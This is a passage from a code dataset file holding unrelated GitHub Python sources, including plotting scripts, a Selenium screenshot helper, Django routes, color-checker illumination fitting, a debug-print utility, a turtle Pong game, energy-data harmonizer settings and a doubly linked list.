cells=11406')\r\n#plt.plot(xp['x_0.003'], xp['p_0.003_0.4'], label='ss_lc=ps_lc=0.003; edge_lc=0.4 // cells=14467')\r\n#plt.plot(xp100['x_0.003'], xp100['p_0.003_0.3'], label='ss_lc=ps_lc=0.003; edge_lc=0.3 // cells=22871')\r\nplt.plot(xp100['x_0.002'], xp100['p_0.002_0.3'], color='r', label='Re = 100 // cells=30841')\r\nplt.plot(xp1000['x_0.003'], xp1000['p_0.003_0.3'], color='b', label='Re = 1000 // cells = 22871')\r\n\r\n\r\n\r\n# set label\r\nplt.xlabel('x/c')\r\nplt.ylabel('pressure [Pa]')\r\nplt.title('Pressure Distribution along the Suction and Pressure Surfaces')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=1000')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n'''\r\n\r\n#plt.plot(xp100['time'], xp100['p_100'], color='b', label='Re = 100')\r\nplt.plot(xp1000['time'], xp1000['p_1000'], color='b', label='Re = 1000')\r\n#plt.axvline(x=12.5, color='r', linestyle='--', label='t = 12.5secs')\r\nplt.axvline(x=11, linestyle='--', color='r', label='t = 11secs')\r\n\r\n\r\n# set label\r\nplt.xlabel('time[s]')\r\nplt.ylabel('pressure[Pa]')\r\nplt.title('Variation of pressure with respect to time on the selected point')\r\nplt.legend()\r\nplt.show()\r\n\r\n'''\r\n'''\r\n\r\n# set plot\r\nplt.plot(FC['time'], FC['Cd_100'], label='Cd @ Re=100')\r\nplt.plot(FC['time'], FC['Cd_1000'], label='Cd @ Re=1000')\r\nplt.plot(FC['time'], FC['Cl_100'], label='Cl @ Re=100')\r\nplt.plot(FC['time'], FC['Cl_1000'], label='Cl @ Re=1000')\r\n\r\n\r\n# set label\r\nplt.xlabel('time [secs]')\r\nplt.ylabel('Cd and Cl')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=100')\r\n#plt.title('Pressure Distribution along the Suction and Pressure Surfaces for Re=1000')\r\nplt.legend()\r\nplt.show()\r\n'''","repo_name":"arashjkh/Computational-Fluid-Dynamics-UBC-course","sub_path":"OpenFOAM-projects/Flow-across-NACA5012/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71957154284","text":"import os\nimport logging\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nlogger = logging.getLogger(__name__)\n\noptions = Options()\nexecutable_path = os.getenv(\"EXECUTABLE_PATH\")\nassert executable_path is not None, \"EXECUTABLE_PATH environment variable must be set\"\nlogger.info(f\"EXECUTABLE_PATH is {executable_path}\")\noptions.binary_location = executable_path\noptions.add_argument(\"whitelisted-ips=''\")\noptions.add_argument(\"disable-xss-auditor\")\noptions.add_argument(\"disable-web-security\")\noptions.add_argument(\"allow-running-insecure-content\")\noptions.add_argument(\"no-sandbox\")\noptions.add_argument(\"disable-setuid-sandbox\")\noptions.add_argument(\"disable-popup-blocking\")\noptions.add_argument(\"allow-elevated-browser\")\noptions.add_argument(\"verbose\")\n\n\ndef wait_for_spinner_visible(driver) -> None:\n \"\"\"Wait for spinner to become visible. This should take ~1 seconds.\"\"\"\n spinner: tuple = (By.CSS_SELECTOR, \"svg[class*=spin]\")\n WebDriverWait(driver, 5).until(EC.visibility_of_element_located(spinner))\n\n\nwith webdriver.Chrome(options=options) as driver:\n wait_for_spinner_visible(driver)\n driver.save_screenshot(\"screenshot.png\")\n","repo_name":"y3rsh/ot-app-actions","sub_path":"selenium_basic.py","file_name":"selenium_basic.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11986930875","text":"from django.conf.urls import url\nfrom django.utils.translation import ugettext_lazy as _\n\nimport reply.views\n\n\napp_name = 'reply'\nurlpatterns = [\n url(_(r'^post/$'),\n reply.views.ReplyPostView.as_view(),\n name='replyPost'),\n url(_(r'^list/(?P\\d+)/(?P\\d+)/$'),\n reply.views.ReplyListView.as_view(),\n name='replyList'),\n]\n","repo_name":"LunchWith/app1","sub_path":"src/reply/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2378164724","text":"import matplotlib.pyplot as plt\nimport matplotlib.pylab as pylab\n\nparams = {\n 'axes.labelsize': '35',\n 'xtick.labelsize': '27',\n 'ytick.labelsize': '27',\n 'lines.linewidth': 2,\n 'legend.fontsize': '27',\n 'figure.figsize': '12, 9' # set figure size\n}\npylab.rcParams.update(params) # set figure parameter\n# line_styles=['ro-','b^-','gs-','ro--','b^--','gs--'] #set line style\n\n# We give the coordinate date directly to give an example.\nx1 = [-20, -15, -10, -5, 0, 0, 5, 10, 15, 20]\ny1 = [0, 0.04, 0.1, 0.21, 0.39, 0.74, 0.78, 0.80, 0.82, 0.85]\ny2 = [0, 0.014, 0.03, 0.16, 0.37, 0.78, 0.81, 0.83, 0.86, 0.92]\ny3 = [0, 0.001, 0.02, 0.14, 0.34, 0.77, 0.82, 0.85, 0.90, 0.96]\ny4 = [0, 0, 0.02, 0.12, 0.32, 0.77, 0.83, 0.87, 0.93, 0.98]\ny5 = [0, 0, 0.02, 0.11, 0.32, 0.77, 0.82, 0.90, 0.95, 1]\n\n# 指定图例和格点的大小\nplt.plot(x1, y1, 'bo-', label='m=2, p=10%', markersize=20) # in 'bo-', b is blue, o is O marker, - is solid line and so on\nplt.plot(x1, y2, 'gv-', label='m=4, p=10%', markersize=15)\nplt.plot(x1, y3, 'ys-', label='m=6, p=10%', markersize=10)\nplt.plot(x1, y4, 'ch-', label='m=8, p=10%', markersize=5)\nplt.plot(x1, y5, 'mD-', label='m=10, p=10%', markersize=3)\n\n# fig1 = plt.figure(1)\n# axes = plt.subplot(111) # numRows, numCols, plotNum\naxes = plt.gca() # get current axes\naxes.set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]) # 添加y轴坐标这个是单独的\naxes.grid(True) # 添加网格\n\nplt.legend(loc=\"lower right\") # 设置图例位置\nplt.ylabel('Percentage') # y轴标签\nplt.xlabel('Difference') # x轴标签\n\n#plt.savefig('D:\\\\commonNeighbors_CDF_snapshots.eps', dpi=1000, bbox_inches='tight')\nplt.show()","repo_name":"sg-first/gist.md","sub_path":"gist/matplotlib.py/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74869549484","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Nov 26 11:55:32 2021\r\n\r\n@author: Diloz\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import ndimage\r\nfrom scipy import optimize\r\nimport matplotlib.pylab as plt\r\nfrom joblib import Parallel, delayed\r\nfrom Detect_colorChecker import paralell_search\r\n\r\nimport plotting\r\n\r\n# colrLable = ['blu', 'grn', 'red']\r\n# lbl_illum = ['blu_L', 'grn_L', 'red_L']\r\neps = np.finfo(float).eps\r\n#%% Obtain Checker\r\ndef getChecker(potCrp, cardBW, search_scale, search_degree, num_cores):\r\n\r\n (H_card, W_card) = cardBW.shape[:2]\r\n gray = cv2.cvtColor(potCrp, cv2.COLOR_BGR2GRAY)\r\n edged = cv2.Canny(gray,30,30)\r\n results = Parallel(n_jobs = num_cores, backend = \"threading\")(delayed(paralell_search)(search_scale, degree, edged, H_card, W_card, cardBW) for degree in search_degree)\r\n maxVal_all, _, _, _ = zip(*results)\r\n \r\n ind = np.argmax(maxVal_all)\r\n maxVal, maxLoc, r, SCALE = results[ind]\r\n deg = search_degree[ind]\r\n \r\n (startX, startY) = (int(round(maxLoc[0]*r)), int(round(maxLoc[1]*r)))\r\n (endX, endY) = (int(round((maxLoc[0] + W_card)*r)), int(round((maxLoc[1] + H_card) * r)))\r\n \r\n if deg != 0:\r\n checkerImg = ndimage.rotate(potCrp, deg)\r\n else:\r\n checkerImg = potCrp\r\n \r\n return checkerImg[startY:endY,startX:endX,:],startY, endY, startX, endX, deg\r\n\r\n#%% 3.1 function:Samples the 70% of the area of every patch on the Macbeth colorChercker\r\n# Calculate the mean RGB color of each patch area\r\n# Calculate the color difference between the sample and ideal value in the LAB color space\r\n# the mode of the sample for the three image channels (RGB)\r\ndef cardSampler(colorChecker, checkIMG, colrLable, posn, rows, cols):\r\n colorTable = colorChecker.loc[:, ['position', 'label', 'red', 'grn', 'blu']]\r\n rowSiz = checkIMG.shape[0] /rows\r\n colSiz = checkIMG.shape[1] /cols\r\n winSiz = int((rowSiz * 0.70)/2)\r\n \r\n cardImg = np.zeros(((2*4*winSiz), (2*6*winSiz), 3), dtype=np.uint8)\r\n cardLabel = np.ones_like(cardImg)\r\n \r\n \r\n for cntRow in range(rows):\r\n crow = int((cntRow + 0.5) * rowSiz)\r\n \r\n for cntCol in range(cols):\r\n ccol = int((cntCol + 0.5) * colSiz)\r\n img_patch = checkIMG[crow-winSiz : crow+winSiz, ccol-winSiz : ccol+winSiz]\r\n cardImg[int(2*winSiz*cntRow): int(2*winSiz*(1+cntRow)),\r\n int(2*winSiz*cntCol): int(2*winSiz*(1+cntCol))] = img_patch\r\n indx = int((cntRow*6) + cntCol)\r\n \r\n labl_patch = np.ones_like(img_patch)\r\n\r\n img_LAB = cv2.cvtColor(img_patch, cv2.COLOR_BGR2LAB)\r\n L = np.mean(img_LAB[:, :, 0])\r\n A = np.mean(img_LAB[:, :, 1])\r\n B = np.mean(img_LAB[:, :, 2])\r\n \r\n diff = colorChecker.loc[indx, ['L', 'A', 'B']].values - [L, A, B]\r\n colorTable.loc[indx, 'delta' + '_' + posn] = np.sqrt(np.sum(diff**2))\r\n \r\n\r\n for cnt2 in range(len(colrLable)):\r\n y0_patch = []\r\n # y0_patch = colorChecker[cnt2, indx]\r\n y0_patch = colorChecker.loc[indx, colrLable[cnt2]]\r\n labl_patch[:, :, cnt2] = labl_patch[:, :, cnt2]*y0_patch \r\n \r\n colorTable.loc[indx, colrLable[cnt2] + '_' + posn] = np.mean(img_patch[:, :, cnt2])\r\n \r\n cardLabel[int(2*winSiz*cntRow): int(2*winSiz*(1+cntRow)),\r\n int(2*winSiz*cntCol): int(2*winSiz*(1+cntCol))] = labl_patch\r\n\r\n return cardImg, cardLabel, colorTable\r\n\r\n\r\n\r\n#%%\r\ndef illum_check(colorChecker, df_main, imgSRC, check_rot, colrLable, imgName):\r\n tableLable = colorChecker.loc[:, ['position', 'label', 'red', 'grn', 'blu']].copy()\r\n colorTableAll = tableLable.copy()\r\n # lbl_illum = [sub + \"_L\" for sub in colrLable]\r\n\r\n height = imgSRC.shape[0]\r\n width = imgSRC.shape[1]\r\n padLeft = 20\r\n \r\n imgPad = np.zeros((height + 100, width + 100 + padLeft, 3), np.uint8) # Image padding\r\n imgPad[0:height, padLeft:width+padLeft] = imgSRC.copy()\r\n \r\n # winCol, winRow = 150, 100\r\n winRow, winCol = 70, 200\r\n \r\n df = df_main.copy()\r\n checkers = df.loc[(df['name']=='Checker')].reset_index(drop=True)\r\n checkers_fit = checkers.copy()\r\n\r\n for cnt2 in range(len(checkers)):\r\n colorTable = pd.DataFrame([])\r\n posn, name, top, left, wd, ht = checkers.loc[cnt2, ['position', 'name', \r\n 'top', 'left', 'width', 'height']].values\r\n bottom = top + winRow + ht\r\n right = left+winCol + wd\r\n potCrp = imgPad[top : bottom, left : right]\r\n \r\n sqrsiz = 48\r\n cardBW = np.zeros(((sqrsiz * 4) +1 , (sqrsiz *6) + 1), dtype=np.uint8)\r\n \r\n for row in range(4 + 1):\r\n lineRow = int(sqrsiz * row)\r\n cardBW[lineRow, :] = 255\r\n \r\n for col in range(6 + 1):\r\n lineCol = int(sqrsiz * col)\r\n cardBW[:, lineCol] = 255\r\n \r\n \r\n search_scale = np.linspace(0.8, 1.6, 5)\r\n search_degree = np.linspace(-2.5,2.5,11)\r\n num_cores = 1\r\n\r\n checkerImg, _, _, _, _, _ = getChecker(potCrp, cardBW, \r\n search_scale, search_degree, num_cores)\r\n checkerImg = ndimage.rotate(checkerImg, check_rot)\r\n \r\n cardImg, cardLabel, colorTable = cardSampler(colorChecker, checkerImg, colrLable, posn, rows=4, cols=6)\r\n colorTableAll = pd.concat([colorTableAll, colorTable], axis=1)\r\n colorTableAll = colorTableAll.loc[:, ~colorTableAll.columns.duplicated()] \r\n \r\n illum_img = illum_greyWorld(colorTable, colrLable, posn)\r\n # illum_fit, offset_fit = illum_fitting(cardImg, cardLabel, colrLable)\r\n illum_fit = illum_fitting(cardImg, cardLabel, colrLable)\r\n\r\n checkers.loc[checkers[\"position\"] ==posn, colrLable] = illum_img\r\n checkers_fit.loc[checkers_fit[\"position\"] ==posn, colrLable] = illum_fit\r\n\r\n # magClor = checkers_fit.loc[:, ['blu', 'grn', 'red']].sum(axis=1).values\r\n # checkers_fit.loc[:, \"magClor\"] = magClor\r\n \r\n # for cnt3 in colrLable:\r\n # checkers_fit.loc[:, cnt3 + \"_perc\"] = checkers_fit.loc[:, cnt3] / checkers_fit.loc[:, \"magClor\"]\r\n \r\n \r\n \r\n checkers_fit = addXYZ(checkers_fit)\r\n return checkers, checkers_fit, colorTableAll\r\n\r\n#%%\r\ndef illum_greyWorld(colorTable, colrLable, posn):\r\n BGR_labl = [sub + \"_\" + posn for sub in colrLable]\r\n greyPatch_img = colorTable.loc[colorTable['position'] >=19, BGR_labl]\r\n illum_img = greyPatch_img.mean().values\r\n \r\n return illum_img\r\n\r\n#%%\r\ndef illum_fitting(imgColr, lablColr, colrLable):\r\n cardImg = imgColr.copy()\r\n cardLabel = lablColr.copy()\r\n illum = []\r\n \r\n for cnt in range(len(colrLable)):\r\n illuInitial = (1.0, 0.0)\r\n \r\n y0_card = cardLabel[:,:, cnt].flatten()\r\n y1_card = cardImg[:,:, cnt].flatten()\r\n \r\n indx = np.argsort(y0_card) \r\n y0_card = y0_card[indx]\r\n y1_card = y1_card[indx]\r\n \r\n # Estimate the illuminant of the scene\r\n ErrorFunc = lambda tpl,y0,y1 : (tpl[0]/255) * y0 - y1\r\n l1Final, success = optimize.leastsq(ErrorFunc,illuInitial, args=(y0_card,y1_card), maxfev = 20000)\r\n illum.append(l1Final[0])\r\n \r\n return illum\r\n\r\n#%%\r\n\r\ndef addXYZ(dfColor):\r\n df = dfColor.copy()\r\n \r\n M = np.array([[0.4124564, 0.3575761, 0.1804375],\r\n [0.2126729, 0.7151522, 0.0721750],\r\n [0.0193339, 0.1191920, 0.9503041]])\r\n \r\n for sq in range(len(df)):\r\n RGB_val = df.loc[sq, ['red', 'grn', 'blu']].values\r\n df.loc[sq, ['X', 'Y', 'Z']] = np.matmul(M, RGB_val)\r\n mag = df.loc[sq, ['X', 'Y', 'Z']].sum()\r\n \r\n if mag == 0: mag = eps\r\n \r\n df.loc[sq, ['x', 'y', 'z']] = df.loc[sq, ['X', 'Y', 'Z']].values/mag\r\n # df.loc[sq, ['X', 'Y', 'Z']] = cv2.cvtColor( np.uint8([[RGB_val]] ), cv2.COLOR_RGB2XYZ)[0][0]\r\n df.loc[sq, ['L', 'A', 'B']] = cv2.cvtColor( np.uint8([[RGB_val]] ), cv2.COLOR_RGB2LAB)[0][0]\r\n \r\n # plt.scatter(df.loc[:, 'x'], df.loc[:, 'y'])\r\n # plt.xlim(0, 0.8)\r\n # plt.ylim(0, 0.8)\r\n # plt.show()\r\n \r\n return df","repo_name":"diloc/Color_correction","sub_path":"Color_Constancy/checkerCards.py","file_name":"checkerCards.py","file_ext":"py","file_size_in_byte":8358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26741072465","text":"# type: ignore\n\nimport ast\nimport inspect\nimport os\nimport re\nfrom pprint import pformat\n\nglobal count\ncount = 0\n\n\nclass d:\n \"\"\"\n Prints the name, type and the value of the argument(s) passed to it.\n\n Example:\n >>> a = 1\n >>> b = \"hello\"\n >>> c = [1, 2, 3]\n >>> d(a, b, c)\n d [0] > a: int = 1 | b: str = 'hello' | c: list = [1, 2, 3]\n >>> d()\n d [1] > \"path/to/script.py\", line 10\n >>> d(\"some comment\", a, b, c)\n d [2] > (some comment) | a: int = 1 | b: str = 'hello' | c: list = [1, 2, 3]\n \"\"\"\n\n NO_COLOR = os.getenv(\"NO_COLOR\")\n BLUE = \"\" if NO_COLOR else \"\\033[0;34m\"\n BOLD = \"\" if NO_COLOR else \"\\033[1m\"\n CYAN = \"\" if NO_COLOR else \"\\033[0;36m\"\n GREEN = \"\" if NO_COLOR else \"\\033[0;32m\"\n ITALIC = \"\" if NO_COLOR else \"\\033[3m\"\n RED = \"\" if NO_COLOR else \"\\033[0;31m\"\n YELLOW = \"\" if NO_COLOR else \"\\033[0;33m\"\n R = \"\" if NO_COLOR else \"\\033[0m\" # Reset.\n SEP = f\"{RED}|{R}\"\n CTX = re.compile(r\"^d\\s*\\((.+?)\\)$\")\n\n def __init__(self, *args, **kwargs): # sourcery skip: use-named-expression\n if kwargs:\n raise TypeError(\"d() only accepts positional arguments.\")\n if not args:\n self.print_line_no()\n return\n self.args = args\n\n try:\n frame = inspect.currentframe()\n context = inspect.getframeinfo(frame.f_back).code_context[0]\n found = re.search(d.CTX, context.strip())\n if found:\n arg_names = self.get_arg_names(found[0])\n self.print_args(arg_names)\n else:\n raise ValueError(\"d() arg list must not end with a comma.\")\n finally:\n del frame\n\n def get_arg_names(self, src):\n module = ast.parse(src)\n body = module.body[0].value\n names = []\n for node in ast.walk(body):\n if isinstance(node, ast.Call):\n names.extend(ast.unparse(name) for name in node.args)\n return names\n\n def prettify(self, arg):\n pretty = pformat(arg, compact=True, underscore_numbers=True)\n if isinstance(arg, (list, tuple, dict, set)):\n pretty = \"\\ \\n\" + pretty + \"\\n\"\n return pretty\n\n def print_header(self):\n global count\n header = f\"\\n{d.BLUE}d{d.R} [{d.GREEN}{count}{d.R}] >\"\n count += 1\n print(header, end=\" \")\n\n def print_args(self, names):\n self.print_header()\n to_print = []\n for name, arg in zip(names, self.args):\n t = type(arg).__name__\n if isinstance(arg, type):\n t = arg.__name__\n pretty = self.prettify(arg)\n if name.lstrip(\"'\").rstrip(\"'\") == arg:\n to_print.append(f\"({d.ITALIC}{arg}{d.R}) {d.SEP} \")\n else:\n to_print.append(f\"{d.BOLD}{name}{d.R}: {d.YELLOW}{t}{d.R} = {d.CYAN}{pretty}{d.R} {d.SEP} \")\n print(\"\".join(to_print)[: -len(d.SEP) - 1])\n\n def print_line_no(self):\n script_path = inspect.currentframe().f_back.f_back.f_code.co_filename\n line_no = inspect.currentframe().f_back.f_back.f_lineno\n self.print_header()\n print(f\"'{script_path}', line {d.YELLOW}{line_no}{d.R}\")\n\n\na = {\n \"expand\": \"attributes\",\n \"link\": {\"rel\": \"self\", \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user?username=my_username\"},\n \"name\": \"my_username\",\n \"first-name\": \"My\",\n \"last-name\": \"Username\",\n \"display-name\": \"My Username\",\n \"email\": \"user@example.test\",\n \"password\": {\n \"link\": {\n \"rel\": \"edit\",\n \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user/password?username=my_username\",\n }\n },\n \"active\": True,\n \"attributes\": {\n \"link\": {\n \"rel\": \"self\",\n \"href\": \"http://localhost:8095/crowd/rest/usermanagement/1/user/attribute?username=my_username\",\n },\n \"attributes\": [],\n },\n}\n","repo_name":"overflowy/imagedifftool","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"13432854392","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position):\n super().__init__()\n self.shape(\"square\")\n self.penup()\n self.shapesize(1, 5)\n self.goto(position)\n self.color(\"white\")\n self.speed(\"fastest\")\n self.ht()\n\n def paddle_movement(self):\n\n self.setheading(90)\n self.st()\n\n def up(self):\n self.setheading(90)\n self.forward(20)\n\n def down(self):\n self.setheading(270)\n self.forward(20)\n\n\nclass Ball(Turtle):\n def __init__(self):\n super().__init__()\n self.shape(\"circle\")\n self.penup()\n self.color(\"white\")\n self.goto(0, 0)\n self.x_move = 10\n self.y_move = 35\n self.moving_speed = 0.1\n\n def ball_movement(self):\n x_cor = self.xcor() + self.x_move\n y_cor = self.ycor() + self.y_move\n\n self.goto(x_cor, y_cor)\n\n def bounce(self):\n self.y_move *= -1\n\n def paddle_bounce(self):\n self.x_move *= -1\n self.moving_speed *= 0.9\n\n def new_ball(self):\n self.goto(0, 0)\n self.paddle_bounce()\n self.moving_speed = 0.1\n\n\nclass ScoreBoard(Turtle):\n def __init__(self, ):\n super().__init__()\n self.score = 0\n self.color(\"white\")\n self.hideturtle()\n self.penup()\n self.l_score = 0\n self.r_score = 0\n self.update_score()\n\n def update_score(self):\n self.clear()\n self.goto(-100, 240)\n self.write(f\"{self.l_score}\", False, \"center\", (\"courier\", 40, \"normal\"))\n self.goto(100, 240)\n self.write(f\"{self.r_score}\", False, \"center\", (\"courier\", 40, \"normal\"))\n\n def update_r_score(self):\n self.r_score += 1\n print(self.r_score)\n self.update_score()\n\n def update_l_score(self):\n self.l_score += 1\n print(self.l_score)\n self.update_score()\n","repo_name":"NajiCoder/Pong-Game","sub_path":"Pong.py","file_name":"Pong.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29045522839","text":"from ontology.namespaces_definition import bigg_enums\n\n\ndef postal_code_correction_function(b, stations):\n tries = [1, -1]\n if int(b['station_code'][-1]) == 0:\n tries = [1]\n if int(b['station_code'][-1]) == 9:\n tries = [-1]\n for t in tries:\n try:\n test = str(int(b['station_code']) + t).zfill(5)\n return stations['latitude', 'longitude'].loc[test].items()\n except:\n pass\n\nZONE_DICTIONARY = {\n \"ES\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-ES.txt\",\n \"adms\": [\n (\"province\", \"A.ADM2\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\"),\n ]\n },\n \"BG\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-BG.txt\",\n \"adms\":[\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM2\", \"AddressCity\")\n ]\n }\n}\n\nWEATHER_STATIONS = {\n \"ES\": {\n \"weather_query\":\n \"\"\"\n Match (bs:{bigg}__BuildingSpace)<-[]-(n:{bigg}__Building)-[:{bigg}__hasLocationInfo]->(l:{bigg}__LocationInfo) \n WHERE l.{bigg}__addressPostalCode IS NOT NULL and split(l.uri,\"#\")[0] in {namespaces}\n RETURN bs.uri as subject, l.{bigg}__addressPostalCode as station_code\n \"\"\",\n \"namespaces\": [\"https://icaen.cat\"],\n \"weather_correction_function\": postal_code_correction_function\n },\n \"BG\": {\n \"weather_query\":\n \"\"\"\n Match (bs:{bigg}__BuildingSpace)<-[]-(n:{bigg}__Building)-[:{bigg}__hasLocationInfo]->(l:{bigg}__LocationInfo) \n WHERE split(l.uri,\"#\")[0] in {namespaces}\n RETURN bs.uri as subject, [(l)-[:{bigg}__hasAddressCity{{selected:true}}]->(ad) | ad.geo__name][0] as station_code\n \"\"\",\n \"namespaces\": [\"https://bulgaria.bg\"]\n }\n}\n\nelectricity_agg_cat = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGridElectricity,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='DatadisSource'\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"totalElectricityConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\ngas_agg_cat = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGas,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='NedgiaSource'\"\"\",\n \"freq\": \"\",\n \"agg_name\": \"totalGasConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\nelectricity_agg_bg = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGridElectricity,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='SummarySource'\"\"\",\n \"freq\": \"P1Y\",\n \"agg_name\": \"totalElectricityConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\ngas_agg_bg = [\n {\n \"measured_property\": bigg_enums.EnergyConsumptionGas,\n \"device_query\": f\"\"\"'bigg__Device' in labels(d) AND d.source='SummarySource'\"\"\",\n \"freq\": \"P1Y\",\n \"agg_name\": \"totalGasConsumption\",\n \"required\": \"true\",\n \"agg_func\": [\"SUM\"]\n }\n]\n\noutdoor_weather_device_agg = [\n {\n \"measured_property\": bigg_enums.Temperature,\n \"device_query\": f\"\"\"'bigg__WeatherStation' in labels(d)\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"outdoorTemperature\",\n \"required\": \"true\",\n \"agg_func\": [\"AVG\", \"CDD\", \"HDD\"]\n },\n {\n \"measured_property\": bigg_enums.HumidityRatio,\n \"device_query\": f\"\"\"'bigg__WeatherStation' in labels(d)\"\"\",\n \"freq\": \"PT1H\",\n \"agg_name\": \"outdoorHumidityRatio\",\n \"required\": \"false\",\n \"agg_func\": [\"AVG\"]\n }\n]\n\nDEVICE_AGGREGATORS = {\n \"ES\": {\n \"totalGasConsumption\": gas_agg_cat,\n \"totalElectricityConsumption\": electricity_agg_cat,\n \"externalWeather\": outdoor_weather_device_agg\n },\n \"BG\": {\n \"totalGasConsumption\": gas_agg_bg,\n \"totalElectricityConsumption\": electricity_agg_bg,\n \"externalWeather\": outdoor_weather_device_agg\n }\n}\n\n\nNON_USED_COUNTRIES_IN_BIGG = {\n \"GR\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-GR.txt\",\n \"adms\": [\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\")\n ]\n },\n \"CZ\": {\n \"file\": \"/Users/eloigabal/Downloads/ES/all-geonames-rdf-clean-CZ.txt\",\n \"adms\": [\n (\"province\", \"A.ADM1\", \"AddressProvince\"),\n (\"municipality\", \"A.ADM3\", \"AddressCity\")\n ]\n }\n}\n\n\n","repo_name":"biggproject/Harmonizer","sub_path":"Harmonizer_Cimne/set_up_params.py","file_name":"set_up_params.py","file_ext":"py","file_size_in_byte":4625,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"17916618926","text":"#coding: utf-8\n\nimport math\nearth_redius=6371004\ncons = math.pi/180\n\ndef arc_points(p1,p2):\n x1, y1, x2, y2 = p1 + p2\n rlon1, rlat1, rlon2, rlat2 = float(x1) * cons, float(y1) * cons, float(x2) * cons, float(y2) *cons\n vcos = math.cos(rlat1) * math.cos(rlat2) * math.cos(rlon1 - rlon2) + math.sin(rlat1) * math.sin(rlat2)\n vcos = 1.0 if vcos > 1.0 else (vcos if vcos > -1.0 else -1.0)\n return math.acos(vcos) \n \ndef ll2xyz(p):\n x, y = p[0]*cons, p[1]*cons\n return (math.sin(x)*math.cos(y)*earth_redius, math.cos(x)*math.cos(y)*earth_redius, math.sin(y)*earth_redius)\n\ndef xyz2ll(p):\n x, y, z = p[0]/earth_redius, p[1]/earth_redius, p[2]/earth_redius\n lat = math.asin(z)\n lng = math.asin(x/math.cos(lat))\n \n return (lng/cons, lat/cons)","repo_name":"Cosimzhou/py-truffle","sub_path":"csm/algorithm/geom.py","file_name":"geom.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21994833701","text":"from DoublyLinkedList.node import Node\n\n\nclass DLinkedList:\n\n def __init__(self, data=None):\n if data:\n self.head = self.__create_node__(data)\n else:\n self.head = None\n self.__size = int(self.head is not None)\n\n def get_size(self):\n return self.__size\n\n def insert(self, index, data):\n\n if data is None:\n raise ValueError(\"Data can not be none\")\n\n if index < 0:\n raise ValueError(\"Index can not be a negative number\")\n\n node = self.__create_node__(data)\n current = self.head\n\n if not self.head:\n self.head = node\n\n elif index == 0:\n node.next = current\n current.prev = node\n self.head = node\n\n elif index >= self.__size:\n self.append(data)\n\n else:\n while index > 0:\n current = current.next\n index -= 1\n node.next, node.prev = current, current.prev\n current.prev.next = node\n\n self.__size += 1\n\n def get(self, index):\n current = self.head\n\n if index > self.__size:\n raise IndexError(\"index is larger than list size\")\n\n while index > 0:\n current = current.next\n index -= 1\n\n return current.data\n\n def append(self, data):\n node = self.__create_node__(data)\n\n if not self.head:\n self.head = node\n else:\n current = self.head\n\n while current.next:\n current = current.next\n\n current.next = node\n node.prev = current\n\n self.__size += 1\n\n def delete(self, value):\n current = self.head\n while current:\n if current.data == value:\n break\n current = current.next\n\n if current:\n if not current.prev:\n self.head, self.head.prev = current.next, None\n else:\n if current.next:\n current.prev.next, current.next.prev = current.next, current.prev\n else:\n current.prev.next = None\n self.__size -= 1\n return current\n\n def __str__(self):\n current = self.head\n list_str = \"\"\n while current:\n list_str += f\"{current.data} \"\n current = current.next\n return list_str\n\n @staticmethod\n def __create_node__(data):\n \"\"\"\n A helper method that create Node objects\n\n :param data:\n :return: A Node object\n \"\"\"\n return 